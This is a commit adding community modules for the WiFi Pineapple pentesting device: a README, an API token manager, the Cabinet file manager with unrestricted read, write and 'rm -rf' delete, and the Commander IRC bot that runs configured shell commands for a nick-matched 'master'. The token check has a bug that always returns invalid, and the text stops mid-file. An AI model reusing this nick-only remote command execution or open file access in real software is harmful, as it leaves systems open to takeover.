First commit

modules/CONTRIBUTING.md

@@ -0,0 +1,11 @@
+Contributing
+============
+
+To ease code reviews please follow the [PSR-1](https://www.php-fig.org/psr/psr-1/) and
+[PSR-2](https://www.php-fig.org/psr/psr-2/). Take a few minutes to actually read them,
+they're not all that bad. To jump right in use the [PHP-CS-Fixer
+tool](http://cs.sensiolabs.org/). Or install PHP_CodeSniffer and use it like so:
+
+`apt install php-codesniffer`
+
+`phpcs --standard=PSR2 your_file.php`

modules/README.md

@@ -0,0 +1,95 @@
+# WiFi Pineapple Module Repository
+
+This is the module repository for the WiFi Pineapple NANO and TETRA. All the community developed modules are stored here, and developers should create pull requests for any changes to their 
+modules, or module additions.
+
+## Module Structure
+A WiFi Pineapple Module is created with HTML, AngularJS and PHP. All HTML is done using the Bootstrap CSS framework, and AngularJS combined with our [PHP 
+API](https://wifipineapple.github.io/wifipineapple-wiki//#!api.md) allows for asynchronus updating and easy to implement features for your module.
+
+A basic module will request information through AngularJS to PHP, and then the PHP will provide a response to AngularJS, where it will then be displayed on the HTML page for the user to see.
+
+```
++-------------------+         +--------------+         +-----------+         +------+
+| AngularJS Request |   -->   | PHP Response |   -->   | AngularJS |   -->   | HTML |
++-------------------+         +--------------+         +-----------+         +------+
+```
+
+The structure of a module is as follows:
+```
+.
+├── api
+│   └── module.php
+├── js
+│   └── module.js
+├── module.html
+└── module.info
+```
+
+More information on creating modules can be found [here](https://wifipineapple.github.io/wifipineapple-wiki//#!creating_modules.md) while more information on the API can be found 
+[here](https://wifipineapple.github.io/wifipineapple-wiki//#!api.md).
+
+### module.info
+The `module.info` file is a simple JSON array consisting of `author`, `description`, `devices`, `title`, and `version`. The `version` field will need to be updated with any pull request.
+
+### module.html
+The WiFi Pineapple modules make use of Bootstrap to provide a good mobile viewing experience and a clean look. Module developers are encouraged to make use of Bootstrap components, such as 
+responsive tables and the grid system. To learn more about Bootstrap, visit the [Bootstrap Website](https://getbootstrap.com/). We also include a hook for atleast one AngularJS controller. You 
+can 
+learn more about AngularJS at the [AngularJS Website](https://angularjs.org/).
+
+```
+<div class="row">
+    <div ng-controller="ExampleController" class="col-md-12">
+        {{ hello }}
+    </div>
+</div>
+```
+
+### module.js
+The `js/module.js` file will house the Javascript for your module, and will be the place for controller definitions, in this brief example it will be called `ExampleController`. We will also 
+set a 
+variable called `$scope.hello` with content we will receieve from our PHP. 
+
+```
+registerController("ExampleController", ['$api', '$scope', function($api, $scope) {
+    $api.request({
+        module: 'ExampleModule',
+        action: 'getHello'
+    }, function(response) {
+        $scope.hello = response.text;
+    });
+}])
+```
+
+This snippet makes use of our API to send a request to our PHP with the `getHello` action, and will set it a response into the `$scope.hello` variable.
+
+### module.php
+The `api/module.php` file must be in the `pineapple` namespace, and contain a routing switch statement, for example:
+
+```
+<?php namespace pineapple;
+
+class ExampleModule extends Module
+{
+    public function route()
+    {
+        switch ($this->request->action) {
+            case 'getHello':
+                $this->hello();
+                break;
+            }
+    }
+}
+```
+
+We will then need to call our function `hello()`, which should be `private` and should set a response:
+```
+private function hello()
+{
+    $this->response = array('text' => "Hello World");
+}
+```
+
+**Note:** You should never use the closing `?>` PHP tag in your `module.php` file.
+

modules/src/APITokens/api/module.php

@@ -0,0 +1,83 @@
+<?php namespace pineapple;
+
+require_once('DatabaseConnection.php');
+
+class APITokens extends Module
+{
+    private $dbConnection;
+
+    const DATABASE = "/etc/pineapple/pineapple.db";
+
+    public function __construct($request)
+    {
+        parent::__construct($request, __CLASS__);
+        $this->dbConnection = new DatabaseConnection(self::DATABASE);
+        $this->dbConnection->exec("CREATE TABLE IF NOT EXISTS api_tokens (token VARCHAR NOT NULL, name VARCHAR NOT NULL);");
+    }
+
+    public function getApiTokens()
+    {
+        $this->response = array("tokens" => $this->dbConnection->query("SELECT ROWID, token, name FROM api_tokens;"));
+    }
+
+    public function checkApiToken()
+    {
+        if (isset($this->request->token)) {
+            $token = $this->request->token;
+            $result = $this->dbConnection->query("SELECT token FROM api_tokens WHERE token='%s';", $token);
+            if (!empty($result) && isset($result[0]["token"]) && $result[0]["token"] === $token) {
+                $this->response = array("valid" => true);
+            }
+        }
+        $this->response = array("valid" => false);
+    }
+
+    public function addApiToken()
+    {
+        if (isset($this->request->name)) {
+            $token = hash('sha512', openssl_random_pseudo_bytes(32));
+            $name = $this->request->name;
+            $this->dbConnection->exec("INSERT INTO api_tokens(token, name) VALUES('%s','%s');", $token, $name);
+            $this->response = array("success" => true, "token" => $token, "name" => $name);
+        } else {
+            $this->error = "Missing token name";
+        }
+    }
+
+    public function revokeApiToken()
+    {
+        if (isset($this->request->id)) {
+            $this->dbConnection->exec("DELETE FROM api_tokens WHERE ROWID='%s'", $this->request->id);
+        } elseif (isset($this->request->token)) {
+            $this->dbConnection->exec("DELETE FROM api_tokens WHERE token='%s'", $this->request->token);
+        } elseif (isset($this->request->name)) {
+            $this->dbConnection->exec("DELETE FROM api_tokens WHERE name='%s'", $this->request->name);
+        } else {
+            $this->error = "The revokeApiToken API call requires either a 'id', 'token', or 'name' parameter";
+        }
+    }
+
+    public function route()
+    {
+        switch ($this->request->action) {
+            case 'checkApiToken':
+                $this->checkApiToken();
+                break;
+
+            case 'addApiToken':
+                $this->addApiToken();
+                break;
+
+            case 'getApiTokens':
+                $this->getApiTokens();
+                break;
+
+            case 'revokeApiToken':
+                $this->revokeApiToken();
+                break;
+
+            default:
+                $this->error = "Unknown action";
+        }
+    }
+}

modules/src/APITokens/js/module.js

@@ -0,0 +1,54 @@
+registerController("APITokenController", ['$api', '$scope', function($api, $scope) {
+    $scope.apiTokens = [];
+    $scope.newToken = {
+        name: "",
+        token: ""
+    };
+
+    $scope.getApiTokens = function(){
+        $api.request({
+            'module': 'APITokens',
+            'action': 'getApiTokens'
+        }, function(response){
+            $scope.apiTokens = response.tokens;
+        });
+    };
+
+    $scope.genApiToken = function(){
+        $api.request({
+            'module': 'APITokens',
+            'action': 'addApiToken',
+            'name': $scope.newToken.name
+        }, function(response){
+            $scope.newToken.name = "";
+            $scope.newToken.token = response.token;
+            $scope.getApiTokens();
+        });
+    };
+
+    $scope.revokeApiToken = function($event){
+        var id = $event.target.getAttribute('tokenid');
+        $api.request({
+            'module': 'APITokens',
+            'action': 'revokeApiToken',
+            'id': id
+        }, function(){
+            $scope.getApiTokens();
+        });
+    };
+
+    $scope.selectElem = function(elem){
+        var selectRange = document.createRange();
+        selectRange.selectNodeContents(elem);
+        var selection = window.getSelection();
+        selection.removeAllRanges();
+        selection.addRange(selectRange);
+    }
+
+    $scope.selectOnClick = function($event){
+        var elem = $event.target;
+        $scope.selectElem(elem);
+    };
+
+    $scope.getApiTokens();
+}]);

modules/src/APITokens/module.html

@@ -0,0 +1,61 @@
+<style type="text/css">
+    .panel {
+        width: 90%;
+        float:right;
+        margin-right: 5%;
+    }
+    .table {
+      table-layout:fixed;
+  }
+  .table td {
+      white-space: nowrap;
+      overflow: scroll;
+      text-overflow: ellipsis
+  }
+</style>
+<div class="row" ng-controller="APITokenController">
+    <div class="panel panel-default">
+        <div class="panel-heading">
+            <h3 class="panel-title">
+                Manage API Tokens
+                <span class="pull-right"><button class="btn btn-primary" style="padding: 0px 5px;" ng-click="getApiTokens();">Refresh</button></span>
+            </h3>
+        </div>
+        <table class="table table-hover table-responsive table-condensed" ng-show="apiTokens.length">
+            <thead>
+                <th>ID</th>
+                <th>Name</th>
+                <th>Token</th>
+            </thead>
+            <tbody>
+                <tr ng-repeat="apiToken in apiTokens">
+                    <td class="col-md-1">{{ apiToken.rowid }}</td>
+                    <td class="col-md-3">{{ apiToken.name }}</td>
+                    <td class="col-md-5 token" ng-click="selectOnClick($event);">{{ apiToken.token }}</td>
+                    <td class="col-md-3"><span class="pull-right"><button tokenid="{{ apiToken.rowid }}" class="btn btn-danger btn-sm" ng-click="revokeApiToken($event);">Revoke</button></span></td>
+                </tr>
+            </tbody>
+        </table>
+
+        <div class="panel-body" ng-hide="apiTokens.length">
+            <center><i>No API Tokens</i></center>
+        </div>
+
+    </div>
+    <div class="panel panel-default">
+        <div class="panel-heading">
+            <h3 class="panel-title">
+                Generate New Token
+            </h3>
+        </div>
+        <div class="panel-body">
+            <form class="form-inline" role="form" ng-submit="genApiToken()" novalidate>
+                <div class="form-group">
+                    <label for="tokenName">Token Name:</label>
+                    <input name="tokenName" type="text" class="form-control" id="tokenName" ng-model="newToken.name" autofocus>
+                </div>
+                <button type="submit" class="btn btn-success">Generate</button>
+            </form>
+        </div>
+    </div>
+</div>

modules/src/APITokens/module.info

@@ -0,0 +1,10 @@
+{
+    "author": "Tesla",
+    "description": "Create and delete API tokens on the WiFi Pineapple",
+    "devices": [
+        "nano",
+        "tetra"
+    ],
+    "title": "APITokens",
+    "version": "1.2"
+}

modules/src/Cabinet/api/module.php

@@ -0,0 +1,173 @@
+<?php namespace pineapple;
+
+class Cabinet extends Module
+{
+
+	public function route()
+	{
+		switch($this->request->action) {
+			case 'getDirectoryContents':
+				$this->getDirectoryContents();
+				break;
+
+			case 'getParentDirectory':
+				$this->getParentDirectory();
+				break;
+
+			case 'deleteFile':
+				$this->deleteFile();
+				break;
+
+			case 'editFile':
+				$this->editFile();
+				break;
+
+			case 'getFileContents':
+				$this->getFileContents();
+				break;
+
+			case 'createFolder':
+				$this->createFolder();
+				break;
+
+            case 'download':
+                $this->response = $this->download($this->request->filePath);
+                break;
+
+		}
+	}
+
+	private function getDirectoryContents()
+	{
+		$dir = $this->request->directory;
+
+		$success = false;
+		$contents = array();
+		if (file_exists($dir)) {
+			foreach (preg_grep('/^([^.])/', scandir($dir)) as $file) {
+				$obj = array("name" => $file, "directory" => is_dir($dir . '/' . $file),
+				"path" => realpath($dir . '/' . $file), 
+				"permissions" => substr(sprintf('%o', fileperms($dir . '/' . $file)), -4),
+				"size" => $this->readableFileSize($dir . '/' . $file));
+				array_push($contents, $obj);
+			}
+			$success = true;
+		}
+
+		$this->response = array("success" => $success, "contents" => $contents, "directory" => $dir);
+
+	}
+
+	private function getParentDirectory()
+	{
+		$dir = $this->request->directory;
+		$success = false;
+		$parent = "";
+
+		if (file_exists($dir)) {
+			$parent = dirname($dir);
+			$success = true;
+		}
+
+		$this->response = array("success" => $success, "parent" => $parent);
+
+	}
+
+	private function deleteFile()
+	{
+		$f = $this->request->file;
+		$success = false;
+
+		if (file_exists($f)) {
+			exec("rm -rf " . escapeshellarg($f));
+		}
+
+		if (!file_exists($f)) {
+			$success = true;
+		}
+
+		$this->response = array("success" => $success);
+
+	}
+
+	private function editFile()
+	{
+		$f = $this->request->file;
+		$data = $this->request->contents;
+		$success = false;
+
+		file_put_contents($f, $data);
+		if (file_exists($f)) {
+			$success = true;
+		}
+
+		$this->response = array("success" => $success);
+	}
+
+	private function getFileContents()
+	{
+		$f = $this->request->file;
+		$success = false;
+		$content = "";
+		$size = "0 Bytes";
+
+		if (file_exists($f)) {
+			$success = true;
+			$content = file_get_contents($f);
+			$size = $this->readableFileSize($f);
+		}
+
+		$this->response = array("success" => $success, "content" => $content, "size" => $size);
+
+	}
+
+	private function createFolder()
+	{
+		$dir = $this->request->directory;
+		$name = $this->request->name;
+		$success = false;
+
+		if (!is_dir($dir . '/' . $name)) {
+			$success = true;
+			mkdir($dir . "/" . $name);
+		}
+
+		$this->response = array("success" => $success);
+	}
+
+    /**
+     * Download a file
+     * @param: The path to the file to download
+     * @return array : array
+     */
+    private function download($filePath)
+    {
+        if (file_exists($filePath)) {
+            return array("success" => true, "message" => null, "download" => $this->downloadFile($filePath));
+        } else {
+            return array("success" => false, "message" => "File does not exist", "download" => null);
+        }
+    }
+
+    /**
+     * Get the size of a file and add a unit to the end of it.
+     * @param $file: The file to get size of
+     * @return string: File size plus unit. Exp: 3.14M
+     */
+    private function readableFileSize($file) {
+        $size = filesize($file);
+
+        if ($size == null)
+            return "0 Bytes";
+
+        if ($size < 1024) {
+            return "{$size} Bytes";
+        } else if ($size >= 1024 && $size < 1024*1024) {
+            return round($size / 1024, 2) . "K";
+        } else if ($size >= 1024*1024) {
+            return round($size / (1024*1024), 2) . "M";
+        }
+        return "{$size} Bytes";
+    }
+
+}

modules/src/Cabinet/js/module.js

@@ -0,0 +1,143 @@
+registerController("CabinetController", ['$api', '$scope', function($api, $scope) {
+
+	$scope.userDirectory = '';
+	$scope.currentDirectory = '/';
+	$scope.directoryContents = [];
+	$scope.editFile = {name: "", path: "", content: ""};
+	$scope.deleteFile = {name: "", path: "", directory: false};
+	$scope.newFolder = {name: "", path: $scope.currentDirectory};
+	$scope.message = {};
+
+	$scope.showMessage = function(msgTitle, msgBody) {
+		$scope.message = {title: msgTitle, body: msgBody};
+		$('#messageModal').modal("show");
+	};
+
+	$scope.submitChangeDirectory = function(directory) {
+		console.log(directory);
+	};
+
+	$scope.getDirectoryContents = function(dir) {
+		$api.request({
+			module: "Cabinet",
+			action: "getDirectoryContents",
+			directory: dir
+		}, function(response) {
+			if (response.success == true) {
+				$scope.currentDirectory = response.directory;
+				$scope.directoryContents = [];
+				for (var i = 0; i < response.contents.length; i++) {
+					$scope.directoryContents.unshift({name: response.contents[i].name,
+						directory: response.contents[i].directory, 
+						path: response.contents[i].path, 
+						permissions: response.contents[i].permissions,
+						size: response.contents[i].size
+					});
+				}
+			} else {
+				$scope.showMessage("Error Loading Directory", "There was an error loading directory contents. Please verify that the directory you are navigating to exists.");
+			}
+		});
+	};
+
+	$scope.goToParentDirctory = function() {
+		$api.request({
+			module: "Cabinet",
+			action: "getParentDirectory",
+			directory: $scope.currentDirectory
+		}, function(response) {
+			if (response.success == true) {
+				parent = response.parent;
+				$scope.getDirectoryContents(parent);
+			} else {
+				$scope.showMessage("Error Finding Parent Directory", "An error occured while trying to find the parent directory. Please verify that the directory you are navigating to exists.");
+			}
+		});
+	};
+
+	$scope.requestDeleteFile = function(file) {
+		$scope.deleteFile.name = file.name;
+		$scope.deleteFile.path = file.path;
+		$scope.deleteFile.directory = file.directory;
+		console.log($scope.deleteFile);
+	};
+
+	$scope.sendDeleteFile = function() {
+		$api.request({
+			module: "Cabinet",
+			action: "deleteFile",
+			file: $scope.deleteFile.path
+		}, function(response) {
+			if (response.success == true) {
+				$scope.deleteFile = {};
+				$scope.getDirectoryContents($scope.currentDirectory);
+			} else {
+				$scope.showMessage("Error Deleting File", "An error occured while trying to delete the file " + $scope.deleteFile.path + ". Please verify that this file exists and you have permission to delete it.");
+			}
+		});
+	};
+
+	$scope.requestEditFile = function(file) {
+		$api.request({
+			module: "Cabinet",
+			action: "getFileContents",
+			file: file.path
+		}, function(response) {
+			if (response.success == true) {
+				$scope.editFile = {name: file.name, path: file.path, content: response.content, size: response.size};
+			} else {
+				$scope.showMessage("Error Loading File Contents", "An error occured while trying to load the file " + file.name + ". Please verify that this file exists and you have permission to edit it.");
+			}
+		});
+	};
+
+	$scope.sendEditFile = function() {
+		$api.request({
+			module: "Cabinet",
+			action: "editFile",
+			file: $scope.currentDirectory + "/" + $scope.editFile.name,
+			contents: $scope.editFile.content
+		}, function(response) {
+			if (response.success) {
+				$scope.editFile = {};
+				$scope.getDirectoryContents($scope.currentDirectory);
+			} else {
+				$scope.showMessage("Error Saving File", "An error occured while trying to save the file " + $scope.editFile.name + ". Please verify that this file exists and you have permission to edit it.");
+			}
+		});
+	};
+
+	$scope.createFolder = function() {
+		$api.request({
+			module: "Cabinet",
+			action: "createFolder",
+			name: $scope.newFolder.name,
+			directory: $scope.currentDirectory
+		}, function(response) {
+			if (response.success == true) {
+				$scope.newFolder = {};
+				$scope.getDirectoryContents($scope.currentDirectory);
+			} else {
+				$scope.showMessage("Error Creating Directory", "An error occured while trying to create the folder " + $scope.newFolder.name + ". Please verify that you have permission to create new items in this directory.");
+			}
+		});
+	};
+
+    $scope.download = function(filePath) {
+        $api.request({
+            module: "Cabinet",
+            action: "download",
+            filePath: filePath
+        }, function (response) {
+            if (!response.success) {
+                $scope.showMessage("Error", response.message);
+                return;
+            }
+            window.location = "/api/?download=" + response.download;
+        })
+    };
+
+	$scope.getDirectoryContents($scope.currentDirectory);
+
+
+}]);

modules/src/Cabinet/module.html

@@ -0,0 +1,180 @@
+<div class="row" ng-controller="CabinetController">
+
+	<div class="col-md-12">
+        <div class="panel panel-default">
+            <div class="panel-heading">
+                <h3 class="panel-title">{{ currentDirectory }}</h3>
+            </div>
+
+            <div class="panel-body">
+				<form class="form-inline pull-right" role="form">
+					<div class="input-group">
+						<input type="text" placeholder="Change Directory" class="form-control" ng-model="userDirectory">
+						<span class="input-group-btn">
+							<button type="submit" class="btn btn-default" ng-click="getDirectoryContents(userDirectory)">Go</button>
+						</span>
+					</div>
+				</form>
+				<span class="input-group-btn pull-left">
+					<button type="button" class="btn btn-default btn-sm" ng-show="currentDirectory == '/'" disabled>Back</button>
+					<button type="button" class="btn btn-default btn-sm" ng-click="goToParentDirctory()" ng-hide="currentDirectory == '/'">Back</button>
+					<button type="button" class="btn btn-default btn-sm" data-toggle="modal" data-target="#fileModal">New File</button>
+					<button type="button" class="btn btn-default btn-sm" data-toggle="modal" data-target="#folderModal">New Folder</button>
+					<button type="button" class="btn btn-default btn-sm" ng-click="getDirectoryContents(currentDirectory)">Refresh</button>
+				</span>
+				<br />
+				<hr/>
+				<div class="table-responsive">
+					<table class="table table-striped" align="center">
+						<thead>
+							<th>File Name</th>
+							<th>Location</th>
+							<th>Permissions</th>
+							<th>Size</th>
+							<th>Delete</th>
+							<th>Edit</th>
+						</thead>
+						<tbody>
+							<tr ng-repeat="item in directoryContents">
+								<td ng-hide="item.directory">{{ item.name }}</td>
+								<td ng-show="item.directory"><a href="javascript:;" ng-click="getDirectoryContents(item.path)">{{ item.name }}</a></td>
+								<td class="text-muted"><i>{{ item.path }}</i></td>
+								<td class="text-muted"><i>{{ item.permissions }}</i></td>
+								<td class="text-muted"><i>{{ item.size }}</i></td>
+								<td><a href="" data-toggle="modal" data-target="#deleteModal" ng-click="requestDeleteFile(item)">Delete</a></td>
+								<td><a href="" ng-hide="item.directory" ng-click="requestEditFile(item)" data-toggle="modal" data-target="#fileModal">Edit</a></td>
+							</tr>
+						</tbody>
+					</table>
+				</div>
+            </div>
+        </div>
+    </div>
+
+    <!-- Edit file Modal -->
+	<div id="fileModal" class="modal fade" role="dialog">
+
+		<script type="text/javascript">
+            // Thanks to sud0nick on forums.hak5.org for this snippet
+            $(document).delegate('#cabinetEditor', 'keydown', function(e) {
+                var keyCode = e.keyCode || e.which;
+                if (keyCode == 9) {
+                    for (var i = 0; i < 4; i++) {
+                        // get caret position/selection
+                        var start = this.selectionStart;
+                        var end = this.selectionEnd;
+
+                        var $this = $(this);
+                        var value = $this.val();
+
+                        // set textarea value to: text before caret + tab + text after caret
+                        $this.val(value.substring(0, start)
+                            + " "
+                            + value.substring(end));
+
+                        // put caret at right position again (add one for the tab)
+                        this.selectionStart = this.selectionEnd = start + 1;
+
+                        // prevent the focus lose
+                        e.preventDefault();
+                    }
+                }
+            });
+
+		</script>
+
+		<div class="modal-dialog">
+
+			<!-- Modal content-->
+			<div class="modal-content">
+				<div class="modal-header">
+					<button type="button" class="close" data-dismiss="modal" ng-click="editFile = {}">&times;</button>
+					<h4 class="modal-title">File Editor {{ editFile.name }}</h4>
+				</div>
+				<div class="modal-body">
+						<label class="control-label">File Name</label>
+						<input type="text" class="form-control" ng-model="editFile.name" placeholder="Notes.txt">
+						<br />
+						<label class="control-label">File Contents</label>
+						<a href="javascript:;" ng-click="editFile.content = ''" class="pull-right">Clear</a>
+						<textarea class="form-control" rows="10" id="cabinetEditor" ng-model="editFile.content" placeholder="Write some text here"></textarea>
+						<label class="control-label pull-right">File Size: {{ editFile.size }}</label>
+						<a href="javascript:;" class="pull-left" ng-click="download(editFile.path)">Download</a>
+						<br />
+				</div>
+				<div class="modal-footer">
+					<button type="button" ng-click="sendEditFile()" class="btn btn-success pull-right" data-dismiss="modal">Save</button>
+					<button type="button" class="btn btn-default pull-left" data-dismiss="modal" ng-click="editFile = {}">Cancel</button>
+				</div>
+			</div>
+		</div>
+	</div>
+
+	<!-- Delete file Modal -->
+	<div id="deleteModal" class="modal fade" role="dialog">
+		<div class="modal-dialog">
+
+			<!-- Modal content-->
+			<div class="modal-content">
+				<div class="modal-header">
+					<button type="button" class="close" data-dismiss="modal" ng-click="deleteFile = {}">&times;</button>
+					<h4 class="modal-title">Delete File {{ deleteFile.name }}</h4>
+				</div>
+				<div class="modal-body">
+					<p>You are about to delete {{ deleteFile.name }}. Once you do this it can not be undone.</p>
+					<p ng-show="deleteFile.directory">{{ deleteFile.name }} is a directory. Deleteing it will also delete all files and folders contained inside.</p>
+					<p><b>Are you absolutely sure you want to delete {{ deleteFile.name }} located at {{ deleteFile.path }}?</b></p>
+				</div>
+				<div class="modal-footer">
+					<button type="button" class="btn btn-primary pull-right" data-dismiss="modal" ng-click="deleteFile = {}">Cancel</button>
+					<button type="button" class="btn btn-danger pull-left" data-dismiss="modal" ng-click="sendDeleteFile()">Delete</button>
+				</div>
+			</div>
+		</div>
+	</div>
+
+	<!-- Create directory Modal -->
+	<div id="folderModal" class="modal fade" role="dialog">
+		<div class="modal-dialog">
+
+			<!-- Modal content-->
+			<div class="modal-content">
+				<div class="modal-header">
+					<button type="button" class="close" data-dismiss="modal">&times;</button>
+					<h4 class="modal-title">Create Folder</h4>
+				</div>
+				<div class="modal-body">
+					<form class="form-inline" role="form">
+						<label class="control-label">Folder Name</label>
+						<input type="text" class="form-control" ng-model="newFolder.name" placeholder="Notes.txt">
+					</form>
+				</div>
+				<div class="modal-footer">
+					<button type="button" ng-click="createFolder()" class="btn btn-success pull-left" data-dismiss="modal">Create</button>
+					<button type="button" class="btn btn-default pull-right" data-dismiss="modal">Cancel</button>
+				</div>
+			</div>
+		</div>
+	</div>
+
+	<!-- Create Message Modal -->
+	<div id="messageModal" class="modal fade" role="dialog">
+		<div class="modal-dialog">
+
+			<!-- Modal content-->
+			<div class="modal-content">
+				<div class="modal-header">
+					<button type="button" class="close" data-dismiss="modal">&times;</button>
+					<h4 class="modal-title">{{ message.title }}</h4>
+				</div>
+				<div class="modal-body">
+					<p>{{ message.body }}</p>
+				</div>
+				<div class="modal-footer">
+					<button type="button" class="btn btn-default pull-right" data-dismiss="modal">Dismiss</button>
+				</div>
+			</div>
+		</div>
+	</div>
+
+</div>

modules/src/Cabinet/module.info

@@ -0,0 +1,10 @@
+{
+    "author": "newbi3",
+    "description": "A file manager for the Web Interface",
+    "devices": [
+        "nano",
+        "tetra"
+    ],
+    "title": "Cabinet",
+    "version": "1.1"
+}

modules/src/Commander/LICENSE

@@ -0,0 +1,21 @@
+The MIT License (MIT)
+
+Copyright (c) 2016 Marc
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

modules/src/Commander/Python/commander.conf

@@ -0,0 +1,15 @@
+[Network]
+Server: irc.example.com
+Port: 6667
+Nickname: Commander
+Channel: #commander
+
+[Security]
+Master: Foxtrot
+Trigger: !
+
+[Commands]
+example: mkdir /test/ && touch /test/commander
+
+[Other]
+Debug: off

modules/src/Commander/Python/commander.py

@@ -0,0 +1,122 @@
+#!/usr/bin/python
+
+"""
+Commander.py - Python Backend for the WiFi Pineapple Commander module.
+Version 2 Codename: Electric Boogaloo
+
+Thanks to: sebkinne & tesla
+
+Foxtrot (C) 2016 <foxtrotnull@gmail.com>
+"""
+
+import os
+import ConfigParser
+import sys
+import socket
+import time
+import string
+import select
+import errno
+
+class Commander(object):
+	print "[*] WiFi Pineapple Commander Module"
+	print "[*] peace to: sebkinne & tesla"
+	
+	def run(self):
+		while True:
+			self.fillBuffer()
+			self.parseCommands()
+
+	def parseConfig(self):
+		if os.path.exists('commander.conf'):
+			self.config = ConfigParser.RawConfigParser()
+			self.config.read('commander.conf')
+			if self.config.has_section('Network') and self.config.has_section('Security') and self.config.has_section('Commands') and self.config.has_section('Other'):
+				print "[*] Valid configuration file found!"
+				print ""
+			else:
+				print "[!] No valid configuration file found... Exiting!"
+				sys.exit(1)
+
+		self.server = self.config.get('Network', 'Server')
+		self.port = self.config.getint('Network', 'Port')
+		self.nick = self.config.get('Network', 'Nickname')
+		self.channel = self.config.get('Network', 'Channel')
+		self.master = self.config.get('Security', 'Master')
+		self.trigger = self.config.get('Security', 'Trigger')
+		self.commands = self.config.options('Commands')
+		self.debugmode = self.config.get('Other', 'Debug')
+
+	def printConfig(self):
+		print "[*] Using the following connection settings:"
+		print "    %s" % self.server
+		print "    %d" % self.port
+		print "    %s" % self.nick
+		print "    %s" % self.channel
+		print ""
+
+		print "[*] Using the following security settings:"
+		print "    Master: %s" % self.master
+		print "    Trigger: %s\n" % self.trigger
+
+		print "[*] Listing commands:"
+		for command in self.commands:
+			print "    %s%s" % (self.trigger, command)
+		print ""
+
+	def connect(self):
+		self.sock = socket.socket()
+		print "[*] Connecting!"
+		self.sock.connect((self.server, self.port))
+		print "[*] Sending nick and user information"
+		self.sock.send('NICK %s\r\n' % self.nick)
+		self.sock.send('USER %s 8 * :%s\r\n' % (self.nick, self.nick))
+		time.sleep(2)
+		self.sock.send('JOIN %s\r\n' % self.channel)
+		self.sock.send('PRIVMSG %s :Connected.\r\n' % self.channel)
+		print "[*] Connected!\n"
+
+	def fillBuffer(self):
+		self.buff = ""
+		self.sock.setblocking(0)
+
+		readable, _, _ = select.select([self.sock], [], [])
+		
+		if self.sock in readable:
+			self.buff = ""
+			cont = True
+			while cont:
+				try:
+					self.buff += self.sock.recv(1024)
+				except socket.error,e:
+					if e.errno != errno.EWOULDBLOCK:
+						sys.exit(1)
+					cont = False
+
+	def parseCommands(self):
+		for line in self.buff.split('\r\n'):
+			if self.debugmode.lower() == "on":
+				print line
+				
+			line = line.split()
+
+			if 'PING' in line:
+				print "[*] Replying to ping\n"
+				self.sock.send('PONG ' + line.split()[1] + '\r\n')
+
+			for command in self.commands:
+				if line and line[0].lower().startswith(":" + self.master.lower() + "!"):
+					if ":" + self.trigger + command in line:
+						print "[*] Found command %s%s\n" % (self.trigger, command)
+						self.sock.send('PRIVMSG %s :Executing command %s\r\n' % (self.channel, command))
+						cmd = self.config.get('Commands', command)
+						os.system(cmd)
+
+
+
+if __name__ == '__main__':
+	commander = Commander()
+	commander.parseConfig()
+	commander.printConfig()
+	commander.connect()
+	commander.run()

modules/src/Commander/api/module.php

@@ -0,0 +1,61 @@
+<?php namespace pineapple;
+
+class Commander extends Module
+{
+    public function route()
+    {
+        switch ($this->request->action) {
+            case 'startCommander':
+                $this->startCommander();
+                break;
+
+            case 'stopCommander':
+                $this->stopCommander();
+                break;
+
+            case 'getConfiguration':
+                $this->getConfiguration();
+                break;
+
+            case 'saveConfiguration':
+                $this->saveConfiguration();
+                break;
+
+            case 'restoreDefaultConfiguration':
+                $this->restoreDefaultConfiguration();
+                break;
+        }
+    }
+
+    private function startCommander()
+    {
+        $this->execBackground('cd /pineapple/modules/Commander/Python && python commander.py');
+        $this->response = array("success" => true);
+    }
+
+    private function stopCommander()
+    {
+        exec('kill -9 $(pgrep -f commander)');
+        $this->response = array("success" => true);
+    }
+
+    private function getConfiguration()
+    {
+        $config = file_get_contents('/pineapple/modules/Commander/Python/commander.conf');
+        $this->response = array("CommanderConfiguration" => $config);
+    }
+
+    private function saveConfiguration()
+    {
+        $config = $this->request->CommanderConfiguration;
+        file_put_contents('/pineapple/modules/Commander/Python/commander.conf', $config);
+        $this->response = array("success" => true);
+    }
+
+    private function restoreDefaultConfiguration()
+    {
+        $defaultConfig = file_get_contents('/pineapple/modules/Commander/assets/default.conf');
+        file_put_contents('/pineapple/modules/Commander/Python/commander.conf', $defaultConfig);
+        $this->response = array("success" => true);
+    }
+}

modules/src/Commander/assets/default.conf

@@ -0,0 +1,15 @@
+[Network]
+Server: irc.example.com
+Port: 6667
+Nickname: Commander
+Channel: #commander
+
+[Security]
+Master: Foxtrot
+Trigger: !
+
+[Commands]
+example: mkdir /test/ && touch /test/commander
+
+[Other]
+Debug: off

modules/src/Commander/js/module.js

@@ -0,0 +1,67 @@
+registerController('CommanderController', ['$api', '$scope', function($api, $scope) {
+    $scope.commanderRunning = false;
+
+    $scope.startCommander = (function() {
+        $api.request({
+            module: 'Commander',
+            action: 'startCommander'
+        }, function(response) {
+            if (response.success === true) {
+                $scope.commanderRunning = true;
+            }
+        });
+    });
+
+    $scope.stopCommander = (function() {
+        $api.request({
+            module: 'Commander',
+            action: 'stopCommander'
+        }, function(response){
+            if (response.success === true) {
+                $scope.commanderRunning = false;
+            }
+        });
+    });
+}]);
+
+registerController('CommanderManageController', ['$api', '$scope', '$timeout', function($api, $scope, $timeout) {
+    $scope.CommanderConfiguration = "";
+
+    $scope.getConfiguration = (function() {
+        $api.request({
+            module: 'Commander',
+            action: 'getConfiguration'
+        }, function(response) {
+            console.log(response);
+            if (response.error === undefined){
